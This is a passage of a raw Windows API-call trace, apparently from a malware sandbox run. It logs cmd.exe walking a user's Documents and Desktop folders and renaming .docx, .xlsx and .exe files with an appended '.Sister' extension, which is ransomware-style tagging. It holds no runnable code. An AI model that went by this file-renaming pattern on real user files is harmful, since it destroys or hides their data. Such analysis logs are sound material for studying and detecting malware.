??_V@YAXPEAX@Z () returned 0x21eda34fb60 [0306.168] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\xg3xDIcF-yOyIIxp1s8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\xg3xdicf-yoyiixp1s8.docx")) returned 0x20 [0306.168] malloc (_Size=0xffce) returned 0x21ed993f900 [0306.168] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.169] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\xg3xDIcF-yOyIIxp1s8.docx", fInfoLevelId=0x1, lpFindFileData=0x21ed9370c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9370c20) returned 0x21ed8d66070 [0306.169] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0306.169] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0306.169] ??_V@YAXPEAX@Z () returned 0x1 [0306.169] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\xg3xDIcF-yOyIIxp1s8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\xg3xdicf-yoyiixp1s8.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\xg3xDIcF-yOyIIxp1s8.docx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\xg3xdicf-yoyiixp1s8.docx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0306.170] FindNextFileW (in: hFindFile=0x21ed8d66070, lpFindFileData=0x21ed9370c20 | out: lpFindFileData=0x21ed9370c20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x784c31f0, ftCreationTime.dwHighDateTime=0x1d58d05, ftLastAccessTime.dwLowDateTime=0xb19262a0, ftLastAccessTime.dwHighDateTime=0x1d5a203, ftLastWriteTime.dwLowDateTime=0xb19262a0, ftLastWriteTime.dwHighDateTime=0x1d5a203, nFileSizeHigh=0x0, nFileSizeLow=0xcc54, dwReserved0=0x0, dwReserved1=0x0, cFileName="xg3xDIcF-yOyIIxp1s8.docx", cAlternateFileName="")) returned 0 [0306.172] GetLastError () returned 0x12 [0306.172] FindClose (in: hFindFile=0x21ed8d66070 | out: hFindFile=0x21ed8d66070) returned 1 [0306.172] ??_V@YAXPEAX@Z () returned 0x1 [0306.172] ??_V@YAXPEAX@Z () returned 0x1 [0306.172] ??_V@YAXPEAX@Z () returned 0x1 [0306.172] ??_V@YAXPEAX@Z () returned 0x1 [0306.172] GetProcessHeap () returned 0x21ed8c70000 [0306.172] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65cb0 [0306.172] GetProcessHeap () returned 0x21ed8c70000 [0306.172] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95b60, Size=0x16) returned 0x21ed8c958c0 [0306.172] GetProcessHeap () returned 0x21ed8c70000 [0306.172] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c958c0) returned 0x16 [0306.172] GetProcessHeap () returned 0x21ed8c70000 [0306.172] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x20) returned 0x21ed8d45e90 [0306.172] GetProcessHeap () returned 0x21ed8c70000 [0306.172] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e90) returned 0x20 [0306.172] GetProcessHeap () returned 0x21ed8c70000 [0306.172] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61d40 [0306.173] GetProcessHeap () returned 0x21ed8c70000 [0306.173] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61d40, Size=0xb2) returned 0x21ed93769b0 [0306.173] GetProcessHeap () returned 0x21ed8c70000 [0306.173] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93769b0) returned 0xb2 [0306.173] GetProcessHeap () returned 0x21ed8c70000 [0306.173] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d372a0 [0306.173] GetProcessHeap () returned 0x21ed8c70000 [0306.173] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d372a0, Size=0x30) returned 0x21ed8d372a0 [0306.173] GetProcessHeap () returned 0x21ed8c70000 [0306.173] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d372a0) returned 0x30 [0306.173] GetProcessHeap () returned 0x21ed8c70000 [0306.173] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d372e0 [0306.174] malloc (_Size=0x1ff9c) returned 0x21eda33fb80 [0306.174] GetProcessHeap () returned 0x21ed8c70000 [0306.174] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375930 [0306.174] GetProcessHeap () returned 0x21ed8c70000 [0306.174] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93759f0 [0306.174] ??_V@YAXPEAX@Z () returned 0x1 [0306.174] malloc (_Size=0x1ff9c) returned 0x21eda33fb80 [0306.174] GetProcessHeap () returned 0x21ed8c70000 [0306.174] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93762f0 [0306.175] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda33fb80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0306.175] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6bfa0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65c50 [0306.175] FindClose (in: hFindFile=0x21ed8d65c50 | out: hFindFile=0x21ed8d65c50) returned 1 [0306.175] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6bfa0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d66010 [0306.175] FindClose (in: hFindFile=0x21ed8d66010 | out: hFindFile=0x21ed8d66010) returned 1 [0306.175] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6bfa0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65a10 [0306.175] FindClose (in: hFindFile=0x21ed8d65a10 | out: hFindFile=0x21ed8d65a10) returned 1 [0306.176] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6bfa0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0306.176] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.176] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.176] GetProcessHeap () returned 0x21ed8c70000 [0306.176] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d672b0 [0306.176] ??_V@YAXPEAX@Z () returned 0x1 [0306.176] ??_V@YAXPEAX@Z () returned 0x1 [0306.176] GetProcessHeap () returned 0x21ed8c70000 [0306.176] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d372e0, Size=0x490) returned 0x21ed8d372e0 [0306.176] GetProcessHeap () returned 0x21ed8c70000 [0306.176] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d372e0) returned 0x490 [0306.176] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0306.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.176] GetFileType (hFile=0x50) returned 0x2 [0306.176] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.177] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0306.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.178] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0306.184] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.184] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.184] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0306.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.184] GetFileType (hFile=0x50) returned 0x2 [0306.184] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.184] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0306.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.185] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0306.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.185] GetFileType (hFile=0x50) returned 0x2 [0306.185] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.185] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.186] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d372b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d372b0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0306.186] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0306.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.186] GetFileType (hFile=0x50) returned 0x2 [0306.186] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.186] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0306.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.187] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0306.193] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0306.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.193] GetFileType (hFile=0x50) returned 0x2 [0306.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.193] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.193] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0306.197] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.197] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.197] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.197] malloc (_Size=0xffce) returned 0x21eda33fb80 [0306.198] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.198] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.198] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.198] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.198] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.198] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.198] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.198] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.198] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.198] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.198] ??_V@YAXPEAX@Z () returned 0x1 [0306.198] GetProcessHeap () returned 0x21ed8c70000 [0306.198] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f260 [0306.198] GetProcessHeap () returned 0x21ed8c70000 [0306.198] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f260, Size=0x130) returned 0x21ed8d2d6d0 [0306.198] GetProcessHeap () returned 0x21ed8c70000 [0306.198] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2d6d0) returned 0x130 [0306.198] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.199] malloc (_Size=0xffce) returned 0x21eda33fb80 [0306.199] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.199] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.199] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda33fb80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0306.200] ??_V@YAXPEAX@Z () returned 0x1 [0306.200] GetProcessHeap () returned 0x21ed8c70000 [0306.200] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2d950 [0306.200] GetProcessHeap () returned 0x21ed8c70000 [0306.202] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f000 [0306.202] GetProcessHeap () returned 0x21ed8c70000 [0306.202] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f000, Size=0x130) returned 0x21ed8d2da90 [0306.202] GetProcessHeap () returned 0x21ed8c70000 [0306.202] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2da90) returned 0x130 [0306.202] malloc (_Size=0xffce) returned 0x21eda33fb80 [0306.202] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.202] GetProcessHeap () returned 0x21ed8c70000 [0306.202] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d654d0 [0306.202] GetProcessHeap () returned 0x21ed8c70000 [0306.202] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9370250 [0306.202] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.203] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.203] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.203] GetLastError () returned 0x2 [0306.203] GetProcessHeap () returned 0x21ed8c70000 [0306.203] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9467710 [0306.203] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9467720 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.203] SetErrorMode (uMode=0x0) returned 0x0 [0306.203] SetErrorMode (uMode=0x1) returned 0x0 [0306.203] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda33fb80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0306.203] SetErrorMode (uMode=0x0) returned 0x1 [0306.203] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0306.203] GetProcessHeap () returned 0x21ed8c70000 [0306.203] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9371360 [0306.203] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.203] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.204] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.204] GetLastError () returned 0x2 [0306.204] ??_V@YAXPEAX@Z () returned 0x1 [0306.204] malloc (_Size=0xffce) returned 0x21eda33fb80 [0306.204] ??_V@YAXPEAX@Z () returned 0x21eda33fb80 [0306.204] malloc (_Size=0xffce) returned 0x21eda34fb60 [0306.204] ??_V@YAXPEAX@Z () returned 0x21eda34fb60 [0306.204] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.204] GetLastError () returned 0x2 [0306.204] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.204] GetFileType (hFile=0x54) returned 0x2 [0306.204] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0306.204] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0306.205] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.205] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0306.206] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.206] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.206] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0306.210] longjmp () [0306.210] ??_V@YAXPEAX@Z () returned 0x1 [0306.210] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bf8580, ftCreationTime.dwHighDateTime=0x1d5d8d0, ftLastAccessTime.dwLowDateTime=0x46b9e450, ftLastAccessTime.dwHighDateTime=0x1d57fba, ftLastWriteTime.dwLowDateTime=0x46b9e450, ftLastWriteTime.dwHighDateTime=0x1d57fba, nFileSizeHigh=0x0, nFileSizeLow=0x15a8d, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="XVri3Ngsat8WaE.xlsx", cAlternateFileName="")) returned 1 [0306.210] GetProcessHeap () returned 0x21ed8c70000 [0306.210] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x2e4) returned 0x21ed8c758a0 [0306.212] GetProcessHeap () returned 0x21ed8c70000 [0306.213] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x2e4 [0306.213] GetProcessHeap () returned 0x21ed8c70000 [0306.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9477700 [0306.213] GetProcessHeap () returned 0x21ed8c70000 [0306.213] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9477700, Size=0x30) returned 0x21ed9477700 [0306.213] GetProcessHeap () returned 0x21ed8c70000 [0306.213] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9477700) returned 0x30 [0306.213] GetProcessHeap () returned 0x21ed8c70000 [0306.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9477740 [0306.214] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8710 [0306.214] ??_V@YAXPEAX@Z () returned 0x1 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9477740, Size=0x1b0) returned 0x21ed9477740 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9477740) returned 0x1b0 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9477900 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9477900, Size=0x290) returned 0x21ed9477900 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9477900) returned 0x290 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9477ba0 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9477ba0, Size=0x30) returned 0x21ed9477ba0 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9477ba0) returned 0x30 [0306.214] GetProcessHeap () returned 0x21ed8c70000 [0306.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9477be0 [0306.215] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.215] GetProcessHeap () returned 0x21ed8c70000 [0306.215] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc89d0 [0306.215] ??_V@YAXPEAX@Z () returned 0x1 [0306.215] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.215] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65950 [0306.215] FindClose (in: hFindFile=0x21ed8d65950 | out: hFindFile=0x21ed8d65950) returned 1 [0306.215] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65ad0 [0306.216] FindClose (in: hFindFile=0x21ed8d65ad0 | out: hFindFile=0x21ed8d65ad0) returned 1 [0306.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe11988a2, ftLastAccessTime.dwHighDateTime=0x1d6141f, 